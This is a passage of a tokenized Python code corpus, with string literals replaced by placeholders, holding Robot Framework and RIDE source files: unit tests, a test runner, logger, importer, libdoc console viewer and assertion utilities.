test_test_selection_is_not_empty_when_it_contains_a_test ( self ) : <EOL> self . _tsc . select ( self . _create_test ( ) ) <EOL> self . assertFalse ( self . _tsc . is_empty ( ) ) <EOL> def test_test_selection_is_empty_after_removing_same_test_from_there_even_when_it_is_not_the_same_object ( self ) : <EOL> self . _tsc . select ( self . _create_test ( ) ) <EOL> self . _tsc . select ( self . _create_test ( ) , False ) <EOL> self . assertTrue ( self . _tsc . is_empty ( ) ) <EOL> def test_is_test_selected ( self ) : <EOL> test = self . _create_test ( ) <EOL> self . assertFalse ( self . _tsc . is_test_selected ( test ) ) <EOL> self . _tsc . select ( test ) <EOL> self . assertTrue ( self . _tsc . is_test_selected ( test ) ) <EOL> def test_adding_tag_to_selected_tests ( self ) : <EOL> tests = [ self . _create_test ( '<STR_LIT>' % i ) for i in range ( <NUM_LIT:10> ) ] <EOL> for t in tests : <EOL> self . _tsc . select ( t ) <EOL> self . _tsc . add_tag ( '<STR_LIT:foo>' ) <EOL> for t in tests : <EOL> self . assertEqual ( [ tag . name for tag in t . tags ] , [ '<STR_LIT:foo>' ] ) <EOL> def test_adding_a_tag_to_test_with_a_default_tag ( self ) : <EOL> test = self . _create_test ( ) <EOL> test . datafile_controller . default_tags . execute ( <EOL> ChangeTag ( Tag ( None ) , '<STR_LIT:default>' ) ) <EOL> assert_equals ( [ t . name for t in test . tags ] , [ '<STR_LIT:default>' ] ) <EOL> self . _tsc . select ( test ) <EOL> self . _tsc . add_tag ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ t . name for t in test . tags ] , [ '<STR_LIT:default>' , '<STR_LIT>' ] ) <EOL> def _create_test ( self , name = '<STR_LIT:test>' ) : <EOL> suite = TestCaseFile ( source = '<STR_LIT>' ) <EOL> suite_controller = TestCaseFileController ( suite ) <EOL> parent = TestCaseTableController ( <EOL> suite_controller , suite . testcase_table ) <EOL> test = TestCase ( parent = lambda : <NUM_LIT:0> , name = name ) <EOL> return TestCaseController ( parent , test ) </s>
<s> class libi ( object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def onething ( self ) : <EOL> pass </s>
<s> import os . path <EOL> import unittest <EOL> from resources . setting_utils import TestSettingsHelper <EOL> from robotide . preferences . settings import SettingsMigrator <EOL> class TestMergeSettings ( TestSettingsHelper ) : <EOL> def setUp ( self ) : <EOL> base = os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' , '<STR_LIT>' ) <EOL> self . settings_cfg = os . path . join ( base , '<STR_LIT>' ) <EOL> self . user_cfg = os . path . join ( base , '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_merge_settings ( self ) : <EOL> SettingsMigrator ( self . settings_cfg , self . user_cfg ) . merge ( ) <EOL> SettingsMigrator ( self . settings_cfg , self . user_cfg ) . merge ( ) <EOL> content = self . _read_settings_file_content ( self . user_cfg ) <EOL> line_count = len ( content . splitlines ( ) ) <EOL> self . assertEquals ( line_count , <NUM_LIT> , "<STR_LIT>" % <EOL> line_count ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import os <EOL> from os . path import abspath , dirname , exists , join , normpath <EOL> from robot import run_cli , rebot <EOL> from robotstatuschecker import process_output <EOL> CURDIR = dirname ( abspath ( __file__ ) ) <EOL> OUTPUT_ROOT = join ( CURDIR , '<STR_LIT>' ) <EOL> OUTPUT_PYTHON = join ( OUTPUT_ROOT , '<STR_LIT>' ) <EOL> OUTPUT_JYTHON = join ( OUTPUT_ROOT , '<STR_LIT>' ) <EOL> JAR_PATH = join ( CURDIR , '<STR_LIT:..>' , '<STR_LIT>' ) <EOL> sys . path . append ( join ( CURDIR , '<STR_LIT:..>' , '<STR_LIT:src>' ) ) <EOL> COMMON_OPTS = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def atests ( * opts ) : <EOL> if os . name == '<STR_LIT>' : <EOL> jython ( * opts ) <EOL> process_output ( join ( OUTPUT_JYTHON , '<STR_LIT>' ) ) <EOL> return rebot ( join ( OUTPUT_JYTHON , '<STR_LIT>' ) , outputdir = OUTPUT_JYTHON ) <EOL> elif os . name == '<STR_LIT>' : <EOL> os_includes = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> else : <EOL> os_includes = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> python ( * ( os_includes + opts ) ) <EOL> process_output ( join ( OUTPUT_PYTHON , '<STR_LIT>' ) ) <EOL> return rebot ( join ( OUTPUT_PYTHON , '<STR_LIT>' ) , outputdir = OUTPUT_PYTHON ) <EOL> def python ( * opts ) : <EOL> try : <EOL> run_cli ( [ '<STR_LIT>' , OUTPUT_PYTHON , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> + list ( COMMON_OPTS + opts ) ) <EOL> except SystemExit : <EOL> pass <EOL> def jython ( * opts ) : <EOL> try : <EOL> run_cli ( [ '<STR_LIT>' , OUTPUT_JYTHON , <EOL> '<STR_LIT>' , JAR_PATH , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> + list ( COMMON_OPTS + opts ) ) <EOL> except SystemExit : <EOL> pass <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> if len ( sys . argv ) == <NUM_LIT:1> or '<STR_LIT>' in sys . argv : <EOL> print ( __doc__ ) <EOL> rc = <NUM_LIT> <EOL> else : <EOL> rc = atests ( * sys . argv [ <NUM_LIT:1> : ] ) <EOL> print "<STR_LIT>" % rc <EOL> sys . exit ( rc ) </s>
<s> import os <EOL> def reports_should_be_equal ( file1 , file2 ) : <EOL> with open ( file1 . replace ( '<STR_LIT:/>' , os . sep ) ) as f1 : <EOL> content1 = f1 . readlines ( ) <EOL> with open ( file2 . replace ( '<STR_LIT:/>' , os . sep ) ) as f2 : <EOL> content2 = f2 . readlines ( ) <EOL> for l1 , l2 in zip ( content1 , content2 ) : <EOL> if not _lines_are_equal ( l1 , l2 ) : <EOL> raise AssertionError ( '<STR_LIT>' % ( l1 , l2 ) ) <EOL> if len ( content1 ) != len ( content2 ) : <EOL> raise AssertionError ( "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( file1 , len ( content1 ) , <EOL> file2 , len ( content2 ) ) ) <EOL> def _lines_are_equal ( line1 , line2 ) : <EOL> for changing in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> if changing in line1 and changing in line2 : <EOL> return True <EOL> return line1 == line2 </s>
<s> from DynamicLibrary import DynamicLibrary <EOL> KEYWORDS = { <EOL> '<STR_LIT>' : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT:a>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> } <EOL> class DynamicLibraryWithKwargsSupport ( DynamicLibrary ) : <EOL> def __init__ ( self ) : <EOL> DynamicLibrary . __init__ ( self , ** KEYWORDS ) <EOL> def run_keyword ( self , name , args , kwargs ) : <EOL> return self . _pretty ( * args , ** kwargs ) </s>
<s> file_var1 = - <NUM_LIT> <EOL> file_var2 = '<STR_LIT>' <EOL> LIST__file_listvar = [ True , <NUM_LIT> , '<STR_LIT>' ] <EOL> escaping = '<STR_LIT>' </s>
<s> var_in_variable_file = '<STR_LIT>' </s>
<s> import platform <EOL> HOST = '<STR_LIT:localhost>' <EOL> USERNAME = '<STR_LIT:test>' <EOL> PASSWORD = '<STR_LIT:test>' <EOL> PROMPT = '<STR_LIT>' <EOL> FULL_PROMPT = '<STR_LIT>' % ( USERNAME , platform . uname ( ) [ <NUM_LIT:1> ] ) <EOL> PROMPT_START = '<STR_LIT>' % USERNAME <EOL> HOME = '<STR_LIT>' % USERNAME </s>
<s> class Listener ( object ) : <EOL> def close ( self ) : <EOL> pass <EOL> class Listener2 ( object ) : <EOL> def close ( self ) : <EOL> pass <EOL> ROBOT_LIBRARY_LISTENER = [ Listener ( ) , Listener2 ( ) ] </s>
<s> SCALAR = '<STR_LIT>' <EOL> SCALAR_WITH_ESCAPES = r'<STR_LIT>' <EOL> SCALAR_LIST = '<STR_LIT>' . split ( ) <EOL> LIST__LIST = SCALAR_LIST <EOL> PRIORITIES_1 = PRIORITIES_2 = '<STR_LIT>' </s>
<s> class FatalCatastrophyException ( RuntimeError ) : <EOL> ROBOT_EXIT_ON_FAILURE = True <EOL> class ContinuableApocalypseException ( RuntimeError ) : <EOL> ROBOT_CONTINUE_ON_FAILURE = True <EOL> def exit_on_failure ( ) : <EOL> raise FatalCatastrophyException ( ) <EOL> def raise_continuable_failure ( msg = '<STR_LIT>' ) : <EOL> raise ContinuableApocalypseException ( msg ) </s>
<s> import sys , os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( os . path . join ( '<STR_LIT:.>' , '<STR_LIT:..>' , '<STR_LIT:..>' , '<STR_LIT:src>' ) ) ) <EOL> from robot . version import get_version <EOL> needs_sphinx = '<STR_LIT>' <EOL> extensions = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> autoclass_content = '<STR_LIT>' <EOL> autodoc_default_flags = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> autodoc_member_order = '<STR_LIT>' <EOL> autodoc_mock_imports = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = get_version ( naked = True ) <EOL> release = get_version ( ) <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> def non_example_lines ( line ) : <EOL> if not line . startswith ( ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> return True <EOL> def remove_library_examples ( app , what , name , obj , options , lines ) : <EOL> if name . startswith ( "<STR_LIT>" ) : <EOL> lines [ : ] = filter ( non_example_lines , lines ) <EOL> def setup ( app ) : <EOL> app . connect ( '<STR_LIT>' , remove_library_examples ) </s>
<s> import textwrap <EOL> from robot . utils import MultiMatcher , console_encode <EOL> from robot . errors import DataError <EOL> class ConsoleViewer ( object ) : <EOL> def __init__ ( self , libdoc ) : <EOL> self . _libdoc = libdoc <EOL> self . _keywords = KeywordMatcher ( libdoc ) <EOL> @ classmethod <EOL> def handles ( cls , command ) : <EOL> return command . lower ( ) in [ '<STR_LIT:list>' , '<STR_LIT>' , '<STR_LIT:version>' ] <EOL> @ classmethod <EOL> def validate_command ( cls , command , args ) : <EOL> if not cls . handles ( command ) : <EOL> raise DataError ( "<STR_LIT>" % command ) <EOL> if command . lower ( ) == '<STR_LIT:version>' and args : <EOL> raise DataError ( "<STR_LIT>" ) <EOL> def view ( self , command , * args ) : <EOL> self . validate_command ( command , args ) <EOL> getattr ( self , command . lower ( ) ) ( * args ) <EOL> def list ( self , * patterns ) : <EOL> for kw in self . _keywords . search ( '<STR_LIT>' % p for p in patterns ) : <EOL> self . _console ( kw . name ) <EOL> def show ( self , * names ) : <EOL> if MultiMatcher ( names , match_if_no_patterns = True ) . match ( '<STR_LIT>' ) : <EOL> self . _show_intro ( self . _libdoc ) <EOL> if self . _libdoc . inits : <EOL> self . _show_inits ( self . _libdoc ) <EOL> for kw in self . _keywords . search ( names ) : <EOL> self . _show_keyword ( kw ) <EOL> def version ( self ) : <EOL> self . _console ( self . _libdoc . version or '<STR_LIT>' ) <EOL> def _console ( self , msg ) : <EOL> print ( console_encode ( msg ) ) <EOL> def _show_intro ( self , lib ) : <EOL> self . _header ( lib . name , underline = '<STR_LIT:=>' ) <EOL> named_args = '<STR_LIT>' if lib . named_args else '<STR_LIT>' <EOL> self . _data ( [ ( '<STR_LIT>' , lib . version ) , ( '<STR_LIT>' , lib . scope ) , <EOL> ( '<STR_LIT>' , named_args ) ] ) <EOL> self . _doc ( lib . doc ) <EOL> def _show_inits ( self , lib ) : <EOL> self . _header ( '<STR_LIT>' , underline = '<STR_LIT:->' ) <EOL> for init in lib . inits : <EOL> self . _show_keyword ( init , show_name = False ) <EOL> def _show_keyword ( self , kw , show_name = True ) : <EOL> if show_name : <EOL> self . _header ( kw . name , underline = '<STR_LIT:->' ) <EOL> self . _data ( [ ( '<STR_LIT>' , '<STR_LIT>' % '<STR_LIT:U+002CU+0020>' . join ( kw . args ) ) ] ) <EOL> self . _doc ( kw . doc ) <EOL> def _header ( self , name , underline ) : <EOL> self . _console ( '<STR_LIT>' % ( name , underline * len ( name ) ) ) <EOL> def _data ( self , items ) : <EOL> ljust = max ( len ( name ) for name , _ in items ) + <NUM_LIT:3> <EOL> for name , value in items : <EOL> if value : <EOL> text = '<STR_LIT>' % ( ( name + '<STR_LIT::>' ) . ljust ( ljust ) , value ) <EOL> self . _console ( self . _wrap ( text , subsequent_indent = '<STR_LIT:U+0020>' * ljust ) ) <EOL> def _doc ( self , doc ) : <EOL> self . _console ( '<STR_LIT>' ) <EOL> for line in doc . splitlines ( ) : <EOL> self . _console ( self . _wrap ( line ) ) <EOL> if doc : <EOL> self . _console ( '<STR_LIT>' ) <EOL> def _wrap ( self , text , width = <NUM_LIT> , ** config ) : <EOL> return '<STR_LIT:\n>' . join ( textwrap . wrap ( text , width = width , ** config ) ) <EOL> class KeywordMatcher ( object ) : <EOL> def __init__ ( self , libdoc ) : <EOL> self . _keywords = libdoc . keywords <EOL> def search ( self , patterns ) : <EOL> matcher = MultiMatcher ( patterns , match_if_no_patterns = True ) <EOL> for kw in self . _keywords : <EOL> if matcher . match ( kw . name ) : <EOL> yield kw </s>
<s> from robot . utils import py2to3 <EOL> from . tags import TagPatterns <EOL> @ py2to3 <EOL> class Criticality ( object ) : <EOL> def __init__ ( self , critical_tags = None , non_critical_tags = None ) : <EOL> self . critical_tags = self . _get_tag_patterns ( critical_tags ) <EOL> self . non_critical_tags = self . _get_tag_patterns ( non_critical_tags ) <EOL> def _get_tag_patterns ( self , tags ) : <EOL> return TagPatterns ( tags ) if not isinstance ( tags , TagPatterns ) else tags <EOL> def tag_is_critical ( self , tag ) : <EOL> return self . critical_tags . match ( tag ) <EOL> def tag_is_non_critical ( self , tag ) : <EOL> return self . non_critical_tags . match ( tag ) <EOL> def test_is_critical ( self , test ) : <EOL> if self . critical_tags and not self . critical_tags . match ( test . tags ) : <EOL> return False <EOL> return not self . non_critical_tags . match ( test . tags ) <EOL> def __nonzero__ ( self ) : <EOL> return bool ( self . critical_tags or self . non_critical_tags ) </s>
<s> import os <EOL> from robot . errors import DataError <EOL> from . console import ConsoleOutput <EOL> from . filelogger import FileLogger <EOL> from . loggerhelper import AbstractLogger , AbstractLoggerProxy <EOL> from . stdoutlogsplitter import StdoutLogSplitter <EOL> class Logger ( AbstractLogger ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , register_console_logger = True ) : <EOL> self . _console_logger = None <EOL> self . _syslog = None <EOL> self . _xml_logger = None <EOL> self . _listeners = None <EOL> self . _library_listeners = None <EOL> self . _other_loggers = [ ] <EOL> self . _message_cache = [ ] <EOL> self . _started_keywords = <NUM_LIT:0> <EOL> self . _error_occurred = False <EOL> self . _error_listener = None <EOL> self . _prev_log_message_handlers = [ ] <EOL> self . _enabled = <NUM_LIT:0> <EOL> if register_console_logger : <EOL> self . register_console_logger ( ) <EOL> @ property <EOL> def start_loggers ( self ) : <EOL> loggers = [ self . _console_logger , self . _syslog , self . _xml_logger , <EOL> self . _listeners , self . _library_listeners ] <EOL> return [ logger for logger in self . _other_loggers + loggers if logger ] <EOL> @ property <EOL> def end_loggers ( self ) : <EOL> loggers = [ self . _listeners , self . _library_listeners , <EOL> self . _console_logger , self . _syslog , self . _xml_logger ] <EOL> return [ logger for logger in loggers + self . _other_loggers if logger ] <EOL> def __iter__ ( self ) : <EOL> return iter ( self . end_loggers ) <EOL> def __enter__ ( self ) : <EOL> if not self . _enabled : <EOL> self . register_syslog ( ) <EOL> self . _enabled += <NUM_LIT:1> <EOL> def __exit__ ( self , * exc_info ) : <EOL> self . _enabled -= <NUM_LIT:1> <EOL> if not self . _enabled : <EOL> self . close ( ) <EOL> def register_console_logger ( self , type = '<STR_LIT>' , width = <NUM_LIT> , colors = '<STR_LIT>' , <EOL> markers = '<STR_LIT>' , stdout = None , stderr = None ) : <EOL> logger = ConsoleOutput ( type , width , colors , markers , stdout , stderr ) <EOL> self . _console_logger = self . _wrap_and_relay ( logger ) <EOL> def _wrap_and_relay ( self , logger ) : <EOL> logger = LoggerProxy ( logger ) <EOL> self . _relay_cached_messages ( logger ) <EOL> return logger <EOL> def _relay_cached_messages ( self , logger ) : <EOL> if self . _message_cache : <EOL> for msg in self . _message_cache [ : ] : <EOL> logger . message ( msg ) <EOL> def unregister_console_logger ( self ) : <EOL> self . _console_logger = None <EOL> def register_syslog ( self , path = None , level = '<STR_LIT>' ) : <EOL> if not path : <EOL> path = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> level = os . environ . get ( '<STR_LIT>' , level ) <EOL> if path . upper ( ) == '<STR_LIT>' : <EOL> return <EOL> try : <EOL> syslog = FileLogger ( path , level ) <EOL> except DataError as err : <EOL> self . error ( "<STR_LIT>" % ( path , err . message ) ) <EOL> else : <EOL> self . _syslog = self . _wrap_and_relay ( syslog ) <EOL> def register_xml_logger ( self , logger ) : <EOL> self . _xml_logger = self . _wrap_and_relay ( logger ) <EOL> def unregister_xml_logger ( self ) : <EOL> self . _xml_logger = None <EOL> def register_listeners ( self , listeners , library_listeners ) : <EOL> self . _listeners = listeners <EOL> self . _library_listeners = library_listeners <EOL> if listeners : <EOL> self . _relay_cached_messages ( listeners ) <EOL> def register_logger ( self , * loggers ) : <EOL> for logger in loggers : <EOL> logger = self . _wrap_and_relay ( logger ) <EOL> self . _other_loggers . append ( logger ) <EOL> def unregister_logger ( self , * loggers ) : <EOL> for logger in loggers : <EOL> self . _other_loggers = [ proxy for proxy in self . _other_loggers <EOL> if proxy . logger is not logger ] <EOL> def disable_message_cache ( self ) : <EOL> self . _message_cache = None <EOL> def register_error_listener ( self , listener ) : <EOL> self . _error_listener = listener <EOL> if self . _error_occurred : <EOL> listener ( ) <EOL> def message ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> for logger in self : <EOL> logger . message ( msg ) <EOL> if self . _message_cache is not None : <EOL> self . _message_cache . append ( msg ) <EOL> if msg . level == '<STR_LIT>' : <EOL> self . _error_occurred = True <EOL> if self . _error_listener : <EOL> self . _error_listener ( ) <EOL> def _log_message ( self , msg ) : <EOL> """<STR_LIT>""" <EOL> for logger in self : <EOL> logger . log_message ( msg ) <EOL> if msg . level in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self . message ( msg ) <EOL> log_message = message <EOL> def log_output ( self , output ) : <EOL> for msg in StdoutLogSplitter ( output ) : <EOL> self . log_message ( msg ) <EOL> def enable_library_import_logging ( self ) : <EOL> self . _prev_log_message_handlers . append ( self . log_message ) <EOL> self . log_message = self . message <EOL> def disable_library_import_logging ( self ) : <EOL> self . log_message = self . _prev_log_message_handlers . pop ( ) <EOL> def start_suite ( self , suite ) : <EOL> for logger in self . start_loggers : <EOL> logger . start_suite ( suite ) <EOL> def end_suite ( self , suite ) : <EOL> for logger in self . end_loggers : <EOL> logger . end_suite ( suite ) <EOL> def start_test ( self , test ) : <EOL> for logger in self . start_loggers : <EOL> logger . start_test ( test ) <EOL> def end_test ( self , test ) : <EOL> for logger in self . end_loggers : <EOL> logger . end_test ( test ) <EOL> def start_keyword ( self , keyword ) : <EOL> self . _started_keywords += <NUM_LIT:1> <EOL> self . log_message = self . _log_message <EOL> for logger in self . start_loggers : <EOL> logger . start_keyword ( keyword ) <EOL> def end_keyword ( self , keyword ) : <EOL> self . _started_keywords -= <NUM_LIT:1> <EOL> for logger in self . end_loggers : <EOL> logger . end_keyword ( keyword ) <EOL> if not self . _started_keywords : <EOL> self . log_message = self . message <EOL> def imported ( self , import_type , name , ** attrs ) : <EOL> for logger in self : <EOL> logger . imported ( import_type , name , attrs ) <EOL> def output_file ( self , file_type , path ) : <EOL> """<STR_LIT>""" <EOL> for logger in self : <EOL> logger . output_file ( file_type , path ) <EOL> def close ( self ) : <EOL> for logger in self : <EOL> logger . close ( ) <EOL> self . __init__ ( register_console_logger = False ) <EOL> class LoggerProxy ( AbstractLoggerProxy ) : <EOL> _methods = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:message>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> LOGGER = Logger ( ) </s>
<s> from robot import model <EOL> from robot . utils import is_string , secs_to_timestamp , timestamp_to_secs <EOL> class SuiteConfigurer ( model . SuiteConfigurer ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , remove_keywords = None , log_level = None , start_time = None , <EOL> end_time = None , critical_tags = None , non_critical_tags = None , <EOL> ** base_config ) : <EOL> model . SuiteConfigurer . __init__ ( self , ** base_config ) <EOL> self . remove_keywords = self . _get_remove_keywords ( remove_keywords ) <EOL> self . log_level = log_level <EOL> self . start_time = self . _get_time ( start_time ) <EOL> self . end_time = self . _get_time ( end_time ) <EOL> self . critical_tags = critical_tags <EOL> self . non_critical_tags = non_critical_tags <EOL> def _get_remove_keywords ( self , value ) : <EOL> if value is None : <EOL> return [ ] <EOL> if is_string ( value ) : <EOL> return [ value ] <EOL> return value <EOL> def _get_time ( self , timestamp ) : <EOL> if not timestamp : <EOL> return None <EOL> try : <EOL> secs = timestamp_to_secs ( timestamp , seps = '<STR_LIT>' ) <EOL> except ValueError : <EOL> return None <EOL> return secs_to_timestamp ( secs , millis = True ) <EOL> def visit_suite ( self , suite ) : <EOL> model . SuiteConfigurer . visit_suite ( self , suite ) <EOL> self . _remove_keywords ( suite ) <EOL> self . _set_times ( suite ) <EOL> suite . filter_messages ( self . log_level ) <EOL> suite . set_criticality ( self . critical_tags , self . non_critical_tags ) <EOL> def _remove_keywords ( self , suite ) : <EOL> for how in self . remove_keywords : <EOL> suite . remove_keywords ( how ) <EOL> def _set_times ( self , suite ) : <EOL> if self . start_time : <EOL> suite . starttime = self . start_time <EOL> if self . end_time : <EOL> suite . endtime = self . end_time </s>
<s> import copy <EOL> import os . path <EOL> from robot . output import LOGGER <EOL> from robot . errors import FrameworkError <EOL> from robot . utils import normpath , seq2str2 , is_string <EOL> from . builder import ResourceFileBuilder <EOL> from . handlerstore import HandlerStore <EOL> from . testlibraries import TestLibrary <EOL> class Importer ( object ) : <EOL> def __init__ ( self ) : <EOL> self . _library_cache = ImportCache ( ) <EOL> self . _resource_cache = ImportCache ( ) <EOL> def reset ( self ) : <EOL> self . __init__ ( ) <EOL> def close_global_library_listeners ( self ) : <EOL> for lib in self . _library_cache . values ( ) : <EOL> lib . close_global_listeners ( ) <EOL> def import_library ( self , name , args , alias , variables ) : <EOL> lib = TestLibrary ( name , args , variables , create_handlers = False ) <EOL> positional , named = lib . positional_args , lib . named_args <EOL> lib = self . _import_library ( name , positional , named , lib ) <EOL> if alias : <EOL> alias = variables . replace_scalar ( alias ) <EOL> lib = self . _copy_library ( lib , alias ) <EOL> LOGGER . info ( "<STR_LIT>" % ( name , alias ) ) <EOL> return lib <EOL> def import_resource ( self , path ) : <EOL> if path in self . _resource_cache : <EOL> LOGGER . info ( "<STR_LIT>" % path ) <EOL> else : <EOL> resource = ResourceFileBuilder ( ) . build ( path ) <EOL> self . _resource_cache [ path ] = resource <EOL> return self . _resource_cache [ path ] <EOL> def _import_library ( self , name , positional , named , lib ) : <EOL> args = positional + [ '<STR_LIT>' % arg for arg in named ] <EOL> key = ( name , positional , named ) <EOL> if key in self . _library_cache : <EOL> LOGGER . info ( "<STR_LIT>" <EOL> % ( name , seq2str2 ( args ) ) ) <EOL> return self . _library_cache [ key ] <EOL> lib . create_handlers ( ) <EOL> self . _library_cache [ key ] = lib <EOL> self . _log_imported_library ( name , args , lib ) <EOL> return lib <EOL> def _log_imported_library ( self , name , args , lib ) : <EOL> type = lib . __class__ . __name__ . replace ( '<STR_LIT>' , '<STR_LIT>' ) . lower ( ) [ <NUM_LIT:1> : ] <EOL> listener = '<STR_LIT>' if lib . has_listener else '<STR_LIT>' <EOL> LOGGER . info ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> % ( name , seq2str2 ( args ) , lib . version or '<STR_LIT>' , <EOL> type , lib . scope , len ( lib ) , listener ) ) <EOL> if not lib and not lib . has_listener : <EOL> LOGGER . warn ( "<STR_LIT>" % name ) <EOL> def _copy_library ( self , orig , name ) : <EOL> lib = copy . copy ( orig ) <EOL> lib . name = name <EOL> lib . scope = type ( lib . scope ) ( lib ) <EOL> lib . reset_instance ( ) <EOL> lib . handlers = HandlerStore ( orig . handlers . source , <EOL> orig . handlers . source_type ) <EOL> for handler in orig . handlers . _normal . values ( ) : <EOL> handler = copy . copy ( handler ) <EOL> handler . library = lib <EOL> lib . handlers . add ( handler ) <EOL> for handler in orig . handlers . _embedded : <EOL> handler = copy . copy ( handler ) <EOL> handler . library = lib <EOL> lib . handlers . add ( handler , embedded = True ) <EOL> return lib <EOL> class ImportCache ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _keys = [ ] <EOL> self . _items = [ ] <EOL> def __setitem__ ( self , key , item ) : <EOL> if not is_string ( key ) and not isinstance ( key , tuple ) : <EOL> raise FrameworkError ( '<STR_LIT>' ) <EOL> key = self . _norm_path_key ( key ) <EOL> if key not in self . _keys : <EOL> self . _keys . append ( key ) <EOL> self . _items . append ( item ) <EOL> else : <EOL> self . _items [ self . _keys . index ( key ) ] = item <EOL> def add ( self , key , item = None ) : <EOL> self . __setitem__ ( key , item ) <EOL> def __getitem__ ( self , key ) : <EOL> key = self . _norm_path_key ( key ) <EOL> if key not in self . _keys : <EOL> raise KeyError <EOL> return self . _items [ self . _keys . index ( key ) ] <EOL> def __contains__ ( self , key ) : <EOL> return self . _norm_path_key ( key ) in self . _keys <EOL> def values ( self ) : <EOL> return self . _items <EOL> def _norm_path_key ( self , key ) : <EOL> if self . _is_path ( key ) : <EOL> return normpath ( key , case_normalize = True ) <EOL> if isinstance ( key , tuple ) : <EOL> return tuple ( self . _norm_path_key ( k ) for k in key ) <EOL> return key <EOL> def _is_path ( self , key ) : <EOL> return is_string ( key ) and os . path . isabs ( key ) and os . path . exists ( key ) </s>
<s> """<STR_LIT>""" <EOL> from . robottypes import type_name <EOL> from . unic import unic <EOL> def fail ( msg = None ) : <EOL> """<STR_LIT>""" <EOL> _report_failure ( msg ) <EOL> def assert_false ( expr , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if expr : <EOL> _report_failure ( msg ) <EOL> def assert_true ( expr , msg = None ) : <EOL> """<STR_LIT>""" <EOL> if not expr : <EOL> _report_failure ( msg ) <EOL> def assert_not_none ( obj , msg = None , values = True ) : <EOL> """<STR_LIT>""" <EOL> _msg = '<STR_LIT>' <EOL> if obj is None : <EOL> if msg is None : <EOL> msg = _msg <EOL> elif values is True : <EOL> msg = '<STR_LIT>' % ( msg , _msg ) <EOL> _report_failure ( msg ) <EOL> def assert_none ( obj , msg = None , values = True ) : <EOL> """<STR_LIT>""" <EOL> _msg = '<STR_LIT>' % obj <EOL> if obj is not None : <EOL> if msg is None : <EOL> msg = _msg <EOL> elif values is True : <EOL> msg = '<STR_LIT>' % ( msg , _msg ) <EOL> _report_failure ( msg ) <EOL> def assert_raises ( exc_class , callable_obj , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> callable_obj ( * args , ** kwargs ) <EOL> except exc_class as err : <EOL> return err <EOL> else : <EOL> if hasattr ( exc_class , '<STR_LIT>' ) : <EOL> exc_name = exc_class . __name__ <EOL> else : <EOL> exc_name = str ( exc_class ) <EOL> _report_failure ( '<STR_LIT>' % exc_name ) <EOL> def assert_raises_with_msg ( exc_class , expected_msg , callable_obj , * args , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> callable_obj ( * args , ** kwargs ) <EOL> except exc_class as err : <EOL> assert_equal ( expected_msg , unic ( err ) , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> if hasattr ( exc_class , '<STR_LIT>' ) : <EOL> exc_name = exc_class . __name__ <EOL> else : <EOL> exc_name = str ( exc_class ) <EOL> _report_failure ( '<STR_LIT>' % exc_name ) <EOL> def assert_equal ( first , second , msg = None , values = True ) : <EOL> """<STR_LIT>""" <EOL> if not first == second : <EOL> 